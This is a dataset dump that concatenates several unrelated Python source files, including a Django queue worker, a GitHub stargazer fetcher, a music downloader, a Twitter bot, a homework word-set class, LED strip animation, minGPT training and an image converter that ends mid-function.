content stringlengths 5 1.05M |
|---|
from datetime import datetime
import os
import platform
from setproctitle import setproctitle
import sys
import time
import traceback
from django.core.cache import cache
from django.core.management.base import BaseCommand, CommandError
from integlib.logbook_utils import configure_logging
from integlib.runtime import runtime
from queueapp.models import Queue, Issue, JiraPoller, AutoFilter, NopFilter, JenkinsActuator, Log
from queueapp.utils import Tee
FULL_RUN_INTERVAL = 120 # do a full run each 2 minutes
PROCNAME = 'this is the queueapp worker process'
TEEFILE = '/tmp/queueapp_worker'
def get_active_comp(comp_class, queue):
return comp_class.objects.filter(queue=queue).exclude(is_active=False)
class Command(BaseCommand):
help = 'Run the queueapp worker process'
def __init__(self, *args, **kwargs):
self.pid = os.getpid()
self.first_run = True
setproctitle(f'{PROCNAME}:{self.pid}')
teefile = open(f'{TEEFILE}.{self.pid}', 'w+b', buffering=0)
sys.stdout = Tee(sys.stdout, teefile)
sys.stderr = Tee(sys.stderr, teefile)
super().__init__(*args, **kwargs)
def handle(self, *args, **options):
if platform.system() == 'Darwin' and ('TMPDIR' not in os.environ
or not os.environ['TMPDIR'].startswith('/Volumes/')):
self.stderr.write(
'Macintosh traditionally defaults to a case-insensitive FS, bless its little soul.\n'
'I am assuming that this is the case on this computer (CBA to test it properly).\n'
'Set the TMPDIR environment variable pointing to a case-sensitive FS to continue.')
return
verbosity = int(options['verbosity'])
configure_logging(verbose=verbosity > 1)
while True:
self.stdout.write('\n---')
started = datetime.now()
self.stdout.write(f'Started a full run on {started}')
self.full_run(verbosity)
self.first_run = False
duration = datetime.now() - started
self.stdout.write(f'The run took {duration}')
duration_sec = duration.total_seconds()
if duration_sec < FULL_RUN_INTERVAL:
pause = FULL_RUN_INTERVAL - duration_sec
self.stdout.write(f'Chilling for {pause} seconds')
time.sleep(pause)
def full_run(self, verbosity):
cache.clear()
queues = list(Queue.objects.exclude(is_active=False))
self.stdout.write('The following queues are active:')
for q in queues:
self.stdout.write(f'- {q.name}')
if self.first_run:
q.log(f'Worker process started, pid={self.pid}')
for q in queues:
self.update_issues(q)
actuator = get_active_comp(JenkinsActuator, q).first()
if actuator:
self.run_and_log_errors(actuator, method='check_running_issues')
if verbosity > 1:
self.stdout.write(f'Done: JenkinsActuator.check_running_issues ({datetime.now()})')
jpoller = get_active_comp(JiraPoller, q).first()
if jpoller:
self.run_and_log_errors(jpoller)
if verbosity > 1:
self.stdout.write(f'Done: JiraPoller ({datetime.now()})')
nopfilters = get_active_comp(NopFilter, q)
for filter in nopfilters:
self.run_and_log_errors(filter)
autofilters = get_active_comp(AutoFilter, q)
for filter in autofilters:
self.run_and_log_errors(filter)
if verbosity > 1:
self.stdout.write(f'Done: AutoFilter ({datetime.now()})')
actuator = get_active_comp(JenkinsActuator, q).first()
if actuator:
self.run_and_log_errors(actuator)
if verbosity > 1:
self.stdout.write(f'Done: JenkinsActuator ({datetime.now()})')
Log.truncate_logs(q)
def run_and_log_errors(self, runnable, method='run'):
try:
getattr(runnable, method)()
except KeyboardInterrupt:
self.stderr.write('Received ^C, quitting')
raise
except:
self.stderr.write(f'An error occurred in {runnable}')
self.stderr.write(traceback.format_exc())
def update_issues(self, q):
self.stdout.write('Updating issues in buffers...')
issues = list(Issue.objects.filter(buffer__queue=q, is_running=False))
issues_updated = 0
for issue in issues:
try:
integ_issue = runtime.jira.get_issue(issue.key)
issues_updated += 1
except:
pass # Ignore Jira errors
else:
issue.update_props(integ_issue)
if integ_issue.status != issue.buffer.intended_status:
intended_status = issue.buffer.intended_status
issue.buffer = None
q.log(f'Dropping the issue <a class=issue>{issue.key}</a> from the queue '
f'because its status has changed and is no longer <b>{intended_status}</b>')
issue.save()
self.stdout.write(f'Updated {issues_updated} out of {len(issues)} issue(s)')
|
import collections
import json
import logging
import traceback
from urllib.parse import urlparse, parse_qs
import github as gh
from tornado.httpclient import AsyncHTTPClient
import tornado.gen
def parse_link(link_header):
l0, l1 = link_header.split(',')
next_url = l0.strip()[1:-len('>; rel="next"')]
last_url = l1.strip()[1:-len('>; rel="last"')]
return next_url, last_url
def handle_response(container, response):
if not response.error:
content = json.loads(response.body.decode('utf-8'))
container.extend(content)
@tornado.gen.coroutine
def repo_stargazers(repo, token):
count = repo.stargazers_count
stargazers_url = repo.stargazers_url
page_size = 100
headers = {'User-Agent': 'tornado'}
if token:
headers['Authorization'] = 'token {}'.format(token)
headers['Accept'] = 'application/vnd.github.v3.star+json'
url = stargazers_url + "?per_page={}&page={}".format(page_size, 1)
# Be good citizens and allow a maximum of 40 concurrent requests.
client = AsyncHTTPClient(max_clients=40)
response = yield client.fetch(url, headers=headers)
stargazers = []
handle_response(stargazers, response)
if 'Link' not in response.headers:
return stargazers
next_url, last_url = parse_link(response.headers['Link'])
qs = parse_qs(urlparse(last_url).query)
last_page = int(qs['page'][0])
from functools import partial
get_stargazers = partial(handle_response, stargazers)
futures = []
for page in range(2, last_page + 1):
url = stargazers_url + "?per_page={}&page={}".format(page_size, page)
f = client.fetch(url, headers=headers, callback=get_stargazers)
f.url = url
futures.append(f)
error_count = 0
while futures:
waited = False
for future in futures[:]:
future = futures.pop(0)
try:
yield future
except tornado.httpclient.HTTPError as err:
# Try again, but give it a little while...
url = future.url
if error_count < 5:
f = client.fetch(future.url, headers=headers,
callback=get_stargazers)
f.url = future.url
futures.append(f)
else:
if not waited:
# Give Github some time to get over our request
# before we retry.
logging.exception("Sleeping attempt {} to rectify "
"fetch error.".format(error_count))
yield tornado.gen.sleep(15)
error_count += 1
waited = True
logging.exception('A problem with {} occured after {} '
'attempts. Skipping'
''.format(url, error_count))
logging.exception(traceback.format_exc())
if len(stargazers) != count:
logging.warning('The number of expected stargazers ({}) did not '
'match the number we recieved ({}).'
''.format(count, len(stargazers)))
return stargazers
if __name__ == '__main__':
token = '...'
token = None
g = gh.Github(token)
r = g.get_repo('d3/d3')
# r = g.get_repo('dask/dask')
r = g.get_repo('scitools/iris')
from tornado.ioloop import IOLoop
from functools import partial
stargazers_fn = partial(repo_stargazers, r, token)
stargazers = IOLoop.instance().run_sync(stargazers_fn)
stargazers = IOLoop.instance().run_sync(stargazers_fn)
print(len(stargazers))
print(stargazers[50])
|
#!/usr/bin/env python3
# Copyright 2014 Jason Heeris, jason.heeris@gmail.com
#
# This file is part of the gammatone toolkit, and is licensed under the 3-clause
# BSD license: https://github.com/detly/gammatone/blob/master/COPYING
import nose
import numpy as np
import scipy.io
from pkg_resources import resource_stream
import gammatone.filters
REF_DATA_FILENAME = 'data/test_erbspace_data.mat'
INPUT_KEY = 'erbspace_inputs'
RESULT_KEY = 'erbspace_results'
INPUT_COLS = ('f_low', 'f_high', 'num_f')
RESULT_COLS = ('cfs',)
def load_reference_data():
""" Load test data generated from the reference code """
# Load test data
with resource_stream(__name__, REF_DATA_FILENAME) as test_data:
data = scipy.io.loadmat(test_data, squeeze_me=False)
zipped_data = zip(data[INPUT_KEY], data[RESULT_KEY])
for inputs, refs in zipped_data:
input_dict = dict(zip(INPUT_COLS, map(np.squeeze, inputs)))
ref_dict = dict(zip(RESULT_COLS, map(np.squeeze, refs)))
yield (input_dict, ref_dict)
def test_ERB_space_known_values():
for inputs, refs in load_reference_data():
args = (
inputs['f_low'],
inputs['f_high'],
inputs['num_f'],
)
expected = (refs['cfs'],)
yield ERBSpaceTester(args, expected)
class ERBSpaceTester:
def __init__(self, args, expected):
self.args = args
self.expected = expected[0]
self.description = (
"ERB space for {:.1f} {:.1f} {:d}".format(
float(self.args[0]),
float(self.args[1]),
int(self.args[2]),
)
)
def __call__(self):
result = gammatone.filters.erb_space(*self.args)
assert np.allclose(result, self.expected, rtol=1e-6, atol=1e-10)
if __name__ == '__main__':
nose.main()
|
from django.conf.urls import url, include
from django.contrib import admin
from . import views
urlpatterns = [
url(r'^$', views.shift_list, name='shift_list'),
]
|
# -*- coding:utf-8 -*-
from os import path
import os
import datetime
import sys
import requests
import config, log, util
import time
import hist_handler
import traceback
from threadpool import ThreadPool
from Queue import Queue
from mutagen.id3 import ID3,TRCK,TIT2,TALB,TPE1,APIC,TDRC,COMM,TPOS,USLT
from threading import Thread
#see download_url_urllib doc
import urllib2
import pydoc
import codecs
LOG = log.get_logger('zxLogger')
if config.LANG.upper() == 'CN':
import i18n.msg_cn as msg
else:
import i18n.msg_en as msg
#total number of jobs
total=0
#the number of finished jobs
done=0
#progress dictionary, for progress display. {filename:Download_Progress obj}
progress = {}
#finsished job to be shown in progress
done2show=[]
#success/failed song lists (song objects)
success_list=[]
failed_list=[]
class Download_Progress(object):
"""
a download progress object
"""
def __init__(self, filename):
self.filename = filename
self.total_length = 0
self.finished_length =0
self.start = datetime.datetime.now()
def percent(self):
"""calculate downloaded percentage"""
return float(self.finished_length) / float(self.total_length) if self.total_length else 0.0
def rate(self):
""" calculate downloading rate """
elapsed = datetime.datetime.now() - self.start
return float(self.total_length-self.finished_length)/float(elapsed.total_seconds())/1024
class Downloader(Thread):
def __init__(self, songs, pool):
Thread.__init__(self)
self.songs = songs
self.pool = pool
def run(self):
global progress
for song in self.songs:
self.pool.add_task(download_single_song, song)
self.pool.wait_completion()
def get_proxy(song):
proxy = None
if song.handler.need_proxy_pool:
proxy = {'http':song.handler.proxy_pool.get_proxy()}
elif song.handler.proxy:
proxy={'http': song.handler.proxy}
return proxy
def write_mp3_meta(song):
"""
write mp3 meta data to downloaded mp3 files
@song an Song instance
"""
id3 = ID3()
id3.add(TIT2(encoding=3, text=song.song_name))
id3.add(TALB(encoding=3, text=song.album_name))
id3.add(TPE1(encoding=3, text=song.artist_name))
id3.add(TRCK(encoding=3, text=str(song.track_no)))
id3.save(song.abs_path)
def print_progress():
""" print progress info """
#the factor of width used for progress bar
percent_bar_factor = 0.4
width = util.get_terminal_size()[1] -5
bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
#line = log.hl(u' %s\n'% ('-'*90), 'cyan')
line = log.hl(u' %s\n'% ('+'*width), 'cyan')
sep = log.hl(u' %s\n'% ('='*width), 'cyan')
sys.stdout.write(u'\x1b[2J\x1b[H') #clear screen
sys.stdout.write(line)
header = msg.fmt_dl_header % (config.DOWNLOAD_DIR, config.THREAD_POOL_SIZE)
#header = util.ljust(header, width)
sys.stdout.write(log.hl(u' %s'%header,'warning'))
sys.stdout.write(line)
fmt_progress = '%s [%s] %.1f%% (%dkib/s)\n'
all_p = [] #all progress bars, filled by following for loop
sum_percent = 0 # total percent for running job
sum_rate = 0 # total rate for running job
total_percent = 0
for filename, prog_obj in progress.items():
percent = prog_obj.percent()
rate = prog_obj.rate()
#sum for the total progress
sum_percent += percent
sum_rate += rate
bar = util.ljust('=' * int(percent * bar_count), bar_count)
per100 = percent * 100
single_p = fmt_progress % \
(util.rjust(filename,(width - bar_count -22)), bar, per100,rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
all_p.append(log.hl(single_p,'green'))
#calculate total progress percent
total_percent = float(sum_percent+done)/total
#global progress
g_text = msg.fmt_dl_progress % (done, total)
g_bar = util.ljust('#' * int(total_percent* bar_count), bar_count)
g_progress = fmt_progress % \
(util.rjust(g_text,(width - bar_count -22)), g_bar, 100*total_percent,sum_rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
#output all total progress bars
sys.stdout.write(log.hl(u'%s'%g_progress, 'red'))
sys.stdout.write(sep)
#output all downloads' progress bars
sys.stdout.write(''.join(all_p))
# finished jobs
if len(done2show):
sys.stdout.write(line)
sys.stdout.write(log.hl(msg.fmt_dl_last_finished % config.SHOW_DONE_NUMBER,'warning'))
sys.stdout.write(line)
#display finished jobs
for d in done2show:
sys.stdout.write(log.hl(u' √ %s\n'% d,'cyan'))
#failed downloads
if len(failed_list):
sys.stdout.write(line)
sys.stdout.write(log.hl(msg.fmt_dl_failed_jobs,'error'))
sys.stdout.write(line)
#display failed jobs
for failed_song in failed_list:
sys.stdout.write(log.hl(u' ✘ %s\n' % failed_song.filename,'red'))
sys.stdout.write(line)
sys.stdout.flush()
def fill_download_progress(filename, total_length, finished_length):
""" fill the global dict progress {} with download progress """
global progress
if filename in progress:
prog_obj = progress[filename]
prog_obj.total_length = total_length
prog_obj.finished_length = finished_length
else:
prog_obj = Download_Progress(filename)
progress[filename] = prog_obj
def download_url_urllib(url,filepath,show_progress=False, proxy=None):
"""
this function does the samething as the download_url(). The different is
this function uses the standard urllib2 to download files.
basic downloading function, download url and save to
file path
http.get timeout: 30s
"""
if ( not filepath ) or (not url):
LOG.error( 'Url or filepath is not valid, resouce cannot be downloaded.')
return 1
fname = path.basename(filepath)
try:
proxyServer = urllib2.ProxyHandler(proxy) if proxy else None
opener = urllib2.build_opener()
if proxyServer:
opener = urllib2.build_opener(proxyServer)
urllib2.install_opener(opener)
r = urllib2.urlopen(url, timeout=30)
if r.getcode() == 200:
total_length = int(r.info().getheader('Content-Length').strip())
done_length = 0
chunk_size=1024
with open(filepath,'wb') as f:
while True:
chunk = r.read(chunk_size)
done_length += len(chunk)
if not chunk:
break
f.write(chunk)
if show_progress:
fill_download_progress(fname, total_length, done_length)
return 0
else:
LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
return 1
except Exception, err:
LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
LOG.debug(traceback.format_exc())
return 1
def download_url(url,filepath,show_progress=False, proxy=None):
"""
basic downloading function, download url and save to
file path
http.get timeout: 30s
"""
if ( not filepath ) or (not url):
LOG.error( 'Url or filepath is not valid, resouce cannot be downloaded.')
return 1
fname = path.basename(filepath)
try:
#get request timeout 30 s
r = requests.get(url, stream=True, timeout=30, proxies=proxy)
if r.status_code == 200:
total_length = int(r.headers.get('content-length'))
done_length = 0
with open(filepath,'wb') as f:
for chunk in r.iter_content(1024):
done_length += len(chunk)
f.write(chunk)
if show_progress:
fill_download_progress(fname, total_length, done_length)
return 0
else:
LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
return 1
except Exception, err:
LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
LOG.debug(traceback.format_exc())
return 1
def download_single_song(song):
"""
download a single song
max retry 5 times
"""
global done, progress
#download retry count
retry = 5
if ( not song.filename ) or (not song.dl_link):
LOG.error( 'Song [id:%s] cannot be downloaded. Filename or dl_link is missing.' % song.song_id)
fill_failed_list(song)
done+=1
return
mp3_file = song.abs_path
dl_result = -1 # download return code
LOG.debug("[DL_Song] downloading: %s " % song.dl_link)
while retry > 0 :
retry -= 1
LOG.debug("[DL_Song] start downloading: %s retry: %d" % (mp3_file, 5-retry))
#if file not in progress, add
if song.filename not in progress:
fill_download_progress(song.filename, 0.0, 0.0)
#do the actual downloading
dl_result = download_url_urllib(song.dl_link, mp3_file, show_progress=True, proxy= get_proxy(song))
if dl_result == 0: #success
write_mp3_meta(song)
LOG.debug("[DL_Song] Finished: %s" % mp3_file)
break
else: # return code is not 0
#remove from progress
del progress[song.filename]
if path.exists(song.abs_path):
#remove file if already exists
LOG.debug( '[DL_Song] remove incompleted file : ' + song.abs_path)
os.remove(song.abs_path)
# retry
done+=1 #no matter success of fail, the task was done
if dl_result == 0:
#set the success flag
song.success = True
fill_done2show(song)
#remove from progress
del progress[song.filename]
else:
# if it comes here, 5 retries run out
fill_failed_list(song)
def fill_done2show(song):
"""
fill the given filename into global list 'done2show'
Depends on the config.SHOW_DONE_NUMBER, the eldest entry will be
poped out from the list.
"""
global done2show, success_list
success_list.append(song)
if len(done2show) == config.SHOW_DONE_NUMBER:
done2show.pop()
done2show.insert(0, song.filename)
def fill_failed_list(song):
"""
fill the given song into global list 'failed2show'
"""
global failed_list
failed_list.insert(0,song)
def start_download(songs, skipped_hists):
"""
start multi-threading downloading songs. and generate a summary file
songs: the list of songs need to be downloaded
call the finish_hook function, pass skipped_hist
"""
global total
total = len(songs)
LOG.debug('init thread pool (%d) for downloading'% config.THREAD_POOL_SIZE)
pool = ThreadPool(config.THREAD_POOL_SIZE)
downloader = Downloader(songs, pool)
LOG.debug('Start downloading' )
downloader.start()
while done < total:
time.sleep(1)
print_progress()
# handling lyrics downloading
download_lyrics(songs)
print log.hl(msg.fmt_insert_hist, 'warning')
hist_handler.insert_hist(songs)
print log.hl(msg.fmt_all_finished, 'warning')
#call finish hook
finish_summary(skipped_hists)
def finish_summary(skipped_hist):
"""
build the summary after finishing all dl
skipped_hist: a History list, contains skipped songs, it is not empty only
if incremental_dl is true
"""
border= "\n"+u">>"*40 + u"\n"
#build summary text:
text = []
if skipped_hist:
text.append( border+msg.fmt_summary_skip_title +border)
text.append( msg.fmt_summary_skip_header)
for hist in skipped_hist:
text.append( "%s\t%s\t%s\t%s" % (msg.head_xm if hist.source ==1 else msg.head_163, hist.last_dl_time_str(), hist.song_name, hist.location))
if success_list:
text.append( border+msg.fmt_summary_success_title +border)
text.append( msg.fmt_summary_success_header)
for song in success_list:
text.append('%s\t%s'%(song.song_name, song.abs_path))
if failed_list:
text.append( border+msg.fmt_summary_failed_title +border)
text.append( msg.fmt_summary_failed_header)
for song in failed_list:
text.append('%s\t%s'%(song.song_name, song.abs_path))
while True:
sys.stdout.write(msg.summary_prompt)
choice = raw_input().lower()
if choice == 'q' or choice == '':
break
elif choice == 'v':
pydoc.pager(u"\n".join(text))
break
elif choice == 's':
summary = path.join(config.DOWNLOAD_DIR,'summary_'+str(datetime.datetime.today())+".txt")
with codecs.open(summary, 'w', 'utf-8') as f:
f.write("\n".join(text))
print log.hl(msg.summary_saved % summary ,'cyan')
break
else:
sys.stdout.write(msg.summary_prompt_err)
def download_lyrics(songs):
"""download / write lyric to file if it is needed"""
url_lyric_163 = "http://music.163.com/api/song/lyric?id=%s&lv=1"
percent_bar_factor = 0.4
width = util.get_terminal_size()[1] -5
bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
line = log.hl(u' %s'% ('+'*width), 'cyan')
if songs[0].handler.dl_lyric == True:
print log.hl(msg.fmt_dl_lyric_start, 'warning')
print line
for song in songs:
if song.lyric_abs_path:
print log.hl(u' %s '% song.lyric_filename,'cyan'), #the ending comma is for hide the newline
if song.song_type == 1: #xiami
if song.handler.need_proxy_pool:
if song.lyric_link:
download_url(song.lyric_link, song.lyric_abs_path, show_progress=True, proxy=get_proxy(song))
else:
if song.lyric_link:
download_url(song.lyric_link, song.lyric_abs_path, show_progress=True)
print log.hl(u' √','cyan')
else: #163
lyric_link = url_lyric_163 % song.song_id
lyric_json = song.handler.read_link(lyric_link).json()
if not lyric_json or not lyric_json.has_key('lrc') or not lyric_json['lrc'].has_key('lyric'):
print log.hl(u' ✘ Not Found','red')
continue
song.lyric_text = song.handler.read_link(lyric_link).json()['lrc']['lyric']
import codecs
with codecs.open(song.lyric_abs_path, 'w', 'utf-8') as f:
f.write(song.lyric_text)
print log.hl(u' √','cyan')
print line
|
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema
from flask_marshmallow.fields import AbsoluteUrlFor
from driftbase.models.db import FriendInvite
from marshmallow import pre_dump, fields, post_dump
class InviteSchema(SQLAlchemyAutoSchema):
class Meta:
model = FriendInvite
load_instance = True
include_fk = True
ordered = True
exclude = ("deleted", )
issued_by_player_url = AbsoluteUrlFor("players.entry", player_id='<issued_by_player_id>')
issued_by_player_name = fields.String()
issued_to_player_url = AbsoluteUrlFor("players.entry", player_id='<issued_to_player_id>')
issued_to_player_name = fields.String()
@pre_dump
def _populate_names(self, obj, many, **kwargs):
obj, issued_to_player_name, issued_by_player_name = obj
obj.issued_to_player_name = issued_to_player_name
obj.issued_by_player_name = issued_by_player_name
return obj
class FriendRequestSchema(InviteSchema):
accept_url = AbsoluteUrlFor("friendships.list", player_id='<issued_to_player_id>')
|
# -*- encoding:utf-8 -*-
from datetime import datetime
import socket
import re
from twython import Twython
import os
import json
home = os.path.expanduser("~")
twitter_conf_file = os.path.join(home, '.ashioto', 'twitter.json')
tc = json.load(open(twitter_conf_file))
CONSUMER_KEY = tc["CONSUMER_KEY"]
CONSUMER_SECRET = tc["CONSUMER_SECRET"]
ACCESS_TOKEN = tc["ACCESS_TOKEN"]
ACCESS_TOKEN_SECRET = tc["ACCESS_TOKEN_SECRET"]
class NameServer(object):
def __init__(self, host="localhost", port=8000, buffer_size=8192, timeout=1):
self.host = host
self.port = port
self.buffer_size = buffer_size
self.timeout = timeout
self.conn = None
self.connected = False
self.twitter = Twython(app_key=CONSUMER_KEY,
app_secret=CONSUMER_SECRET,
oauth_token=ACCESS_TOKEN,
oauth_token_secret=ACCESS_TOKEN_SECRET)
def response_ok(self):
self.conn.send('HTTP/1.0 200 OK\r\n\r\n')
def tweet(self, name, title):
songinfo = '♪ "{}" ({})'.format(title, name)
print songinfo
self.twitter.update_status(status=songinfo)
def run(self):
cue = SongCue(callback=self.tweet)
artist_title_re = re.compile("ARTIST=(.*)TITLE=(.*)vorbis")
print "NameServer start at {}:{}".format(self.host, self.port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((self.host, self.port))
s.listen(1)
conn, addr = s.accept()
print 'Connected by', addr
self.conn = conn
while 1:
data = conn.recv(8192)
if not data: break
if not self.connected:
self.response_ok()
self.connected = True
at = artist_title_re.search(data)
if at:
name = at.group(1)
title = at.group(2)
cue.add(name, title)
cue.noop()
self.conn.close()
print "NameServer stop"
class SongCue(object):
def __init__(self, bytime=60, callback=None):
self.bytime = bytime
self.callback = callback
self.new = {}
def add(self, name, title):
self.new["title"] = title
self.new["name"] = name
self.new["time"] = datetime.now()
def noop(self):
if "time" in self.new:
dur = datetime.now() - self.new["time"]
if dur.seconds > self.bytime:
self.fire()
def fire(self):
self.callback(self.new["name"], self.new["title"])
self.new = {}
if __name__ == '__main__':
NameServer().run()
|
from utils import lowercase, key_of_max
import string
#
# WordSet class
#
class WordSet:
"""
Set of unique words, all in lower case and of positive length.
"""
def __init__(self, text):
"""
Form a WordSet from a string of words or collection of words.
"""
# BEGIN Question 2
self.text = text
self.word_set = []
# END Question 2
def words(self):
"""
Return sorted list of words in WordSet.
>>> WordSet("Hi. Hey you. How, the heck, are you?").words()
['are', 'heck', 'hey', 'hi', 'how', 'the', 'you']
"""
# BEGIN Question 2
x= str(self.text).lower()
# m = str(x).translate(string.punctuation)
y= x.split()
y = set([''.join(c for c in s if c not in string.punctuation) for s in y])
y = [s for s in y if s]
while(len(y) != 0):
self.word_set.append(min(y))
y.remove(min(y))
return self.word_set
# END Question 2
def __contains__(self, word):
# BEGIN Question 2
if word in self.text:
return True
else:
return False
# END Question 2
#
# Dictionary class
#
class Dictionary(WordSet):
"""
Construct a dictionary from all the words in a text file.
Subclass of WordSet with a file based initializer.
>>> from wordset import Dictionary
>>> Dictionary('assets/lincoln.txt').words()[55]
'government'
"""
def __init__(self, filename):
with open(filename) as fp:
text = fp.read()
WordSet.__init__(self, text)
#
# WordMunch class
#
class WordMunch(WordSet):
"""
Perform analytics on a set of unique words.
Subclass of WordSet that provides analytics on the words.
"""
def filter(self, ffun):
"""Filter set to include only those that satisfy the filter function predicate."""
# BEGIN
lst = []
for item in WordSet(self.text).words():
# if len(item) == len(ffun):
# lst.append(item)
if ffun(item) == True:
lst.append(item)
return lst
# END
def frequency(self):
"""Return a dictionary of the frequency of each letter in the word set."""
# BEGIN
freq = {}
# for word in my_list:
# for letter in word:
# keys=freq.keys()
# if letter in keys:
# freq[letter]+=1
# else:
# freq[letter]=1
# return freq
whole = ''.join(WordSet(self.text).words())
for m in whole:
if m in freq:
freq[m] += 1
else:
freq[m] = 1
return freq
# END
|
#!/usr/bin/env python
from random import randrange as rand
import neopixel
import datetime
from PIL import Image
import time
import sys
import os
color_scheme = 'RGB'
class SingleAnimation:
active_id = 0
frame = 0
state = True
images = []
def __init__(self, strip, images_src, duration_s, *fps):
self.fps = fps or 25
# fps = fps or 1
self.duration_s = duration_s
self.width = strip['num']
self.height = duration_s * self.fps
self.images_src = images_src
for image_src in images_src:
try:
image = Image.open(image_src).convert(color_scheme)
image = image.resize((self.width, self.height))
image = image.transpose(Image.FLIP_LEFT_RIGHT)
self.images.append(image)
except OSError as e:
print ("Error:", str(e))
self.images_count = len(self.images)
if self.images_count == 0:
print("no images")
sys.exit(1)
self.strip = neopixel.NeoPixel(strip['pin'],
strip['num'],
brightness=0.1,
auto_write=False)
self.active_image = self.images[self.active_id]
print("start image", self.images_src[self.active_id])
# self.active_image.show()
def clear_strip(self):
self.strip.fill((0,0,0))
self.strip.show()
def brightness_set(self, brightness):
self.strip.brightness = min (1, max(0, brightness))
def brightness_plus(self):
if self.strip.brightness < 1:
self.strip.brightness =+ 0.1
def brightness_minus(self):
if self.strip.brightness > 0:
self.strip.brightness =- 0.1
def faster():
pass
def slower():
pass
def set_image(self, _id):
try:
self.active_image = self.images[_id]
self.active_id = _id
except IndexError:
print('no image', _id)
self.frame = 0
src = self.images_src[self.active_id]
print(src)
return src
def next_image(self, direction = 1):
self.active_id = direction + self.active_id
if direction == 1 and self.active_id == self.images_count:
self.active_id = 0
if direction == -1 and self.active_id == 0:
self.active_id = self.images_count - 1
return os.path.basename(self.set_image(self.active_id))
def move_to_next_frame(self):
if self.frame == self.active_image.size[1]:
# self.next_image()
self.frame = 0
self.show_frame()
self.frame +=1
def show_frame(self):
for i in range(self.width):
self.strip[i] = self.active_image.getpixel((i,self.frame))
self.strip.show()
|
import math
import numpy as np
def LinEx(y: int, est: int):
"""
A function that return the error for a given estimation of the number of calls
:param y: truth
:param est: estimation (ŷ in the folowing formula)
:return: LinEx(y, ŷ) = exp[α(y − ŷ)] − α(y − ŷ) − 1
"""
alpha = 0.1
prod = alpha * (y - est)
return math.exp(prod) - prod - 1
def get_error(ys: np.array, ests: np.array):
"""
A function that calculates the average error over a set of estimations
:param ys: a numpy array with shape (n,1)
:param ests: a numpy array with shape (n,1)
:return: the average error
"""
n = ests.shape[0]
assert n == ys.shape[0]
sum_errors = 0.
i = 0
while i < n:
error = LinEx(ys[i], int(3*ests[i]))
# print(error)
sum_errors += error
i += 1
#print(sum_errors/n)
return sum_errors / n
def test():
y = np.array([[2], [0], [1], [2], [1]])
est = np.array([[3], [0], [1], [1], [1]])
print(y.shape)
print(get_error(y, est))
L
if __name__ == "__main__":
test()
|
from dartcms.utils.config import DartCMSConfig
from dartcms.utils.loading import get_model
from django.forms import modelform_factory
app_name = 'feeds'
Feed = get_model('feeds', 'Feed')
config = DartCMSConfig({
'model': Feed,
'grid': {
'grid_columns': [
{'field': 'type', 'width': '10%'},
{'field': 'name', 'width': '90%'},
],
'additional_grid_actions': [
{'url': 'items', 'kwarg_name': 'feed', 'include_urls': 'dartcms.apps.feeds.items.urls'}
]
},
'form': {
'form_class': modelform_factory(Feed, exclude=[]),
}
})
urlpatterns = config.get_urls()
|
# make deterministic
from mingpt.utils import set_seed
set_seed(42)
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
import math
from torch.utils.data import Dataset
from mingpt.model import GPT, GPTConfig,GPTForClassification
from mingpt.trainer import Trainer, TrainerConfig
from mingpt.utils import sample
import logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
import pdb
from sample_dataset import SampleDataset
if __name__ == '__main__':
block_size = 1000 # spatial extent of the model for its context
train_dataset = SampleDataset(dataset_name = 'sample_data', data_dir='./data/', mode='training', block_size=block_size)
validation_dataset = SampleDataset(dataset_name = 'sample_data', data_dir='./data/', mode='validation', block_size=block_size)
num_class = 2
mconf = GPTConfig(train_dataset.vocab_size, block_size,num_class,
n_layer=8, n_head=8, n_embd=512)
model = GPTForClassification(mconf)
tconf = TrainerConfig(max_epochs=200, batch_size=12, learning_rate=6e-4,
lr_decay=True, warmup_tokens=12*20, final_tokens=200*len(train_dataset)*block_size,
num_workers=4,ckpt_path='./logs_/')
trainer = Trainer(model, train_dataset, validation_dataset, tconf)
trainer.train()
print('Done')
|
import argparse
import json
import logging
import subprocess
import sys
import hashlib
import coloredlogs
from wand.image import Image
from basset.exceptions import *
class Converter:
def __init__(self):
coloredlogs.install()
self.input_dir = ""
self.output_dir = ""
self.force_convert = False
self.converted_files_hashes = {}
@staticmethod
def allowed_image_types():
return ["eps", "pdf", "svg", "psd"]
@staticmethod
def sha1_of_file(file_path):
sha = hashlib.sha1()
with open(file_path, 'rb') as f:
for line in f:
sha.update(line)
return sha.hexdigest()
def convert_single_file(self, source_file, destination_file, target_resolution, scale_factor, transparent_color):
sha1_of_original_file = self.sha1_of_file(source_file)
add_transparency_part = ""
if transparent_color:
add_transparency_part = "-transparent \"{0}\"".format(transparent_color)
self.converted_files_hashes[destination_file] = sha1_of_original_file
convert_string = "convert " \
"-density {0}00% " \
"-background none " \
"\"{1}\" " \
" {2} " \
"-resize {3}x{4} " \
"\"{5}\"".format(scale_factor,
source_file,
add_transparency_part,
target_resolution[0],
target_resolution[1],
destination_file)
os.system(convert_string)
def check_if_file_needs_reconverting(self, source_file, destination_file):
sha1_of_original_file = self.sha1_of_file(source_file)
destination_file_missing = not os.path.isfile(destination_file)
destination_file_was_generated_from_the_different_file = destination_file in self.converted_files_hashes and \
self.converted_files_hashes[
destination_file] != sha1_of_original_file
return self.force_convert or destination_file_missing or destination_file_was_generated_from_the_different_file
@staticmethod
def return_first_line_containing_string(lines, match_string):
for line in lines.splitlines():
if match_string in line:
return line
return None
@staticmethod
def get_image_metadata(path):
raw = subprocess.check_output("identify -verbose \"{0}\"".format(path),
shell=True).decode("utf-8")
resolution_id = "Geometry:"
transparent_color_id = "Transparent color:"
resolution = Converter.return_first_line_containing_string(raw, resolution_id)
resolution = resolution.replace(resolution_id, "").strip(" \t\n\r").split("+")[0]
resolution_parts = resolution.split("x")
transparent_color = Converter.return_first_line_containing_string(raw, transparent_color_id)
if transparent_color:
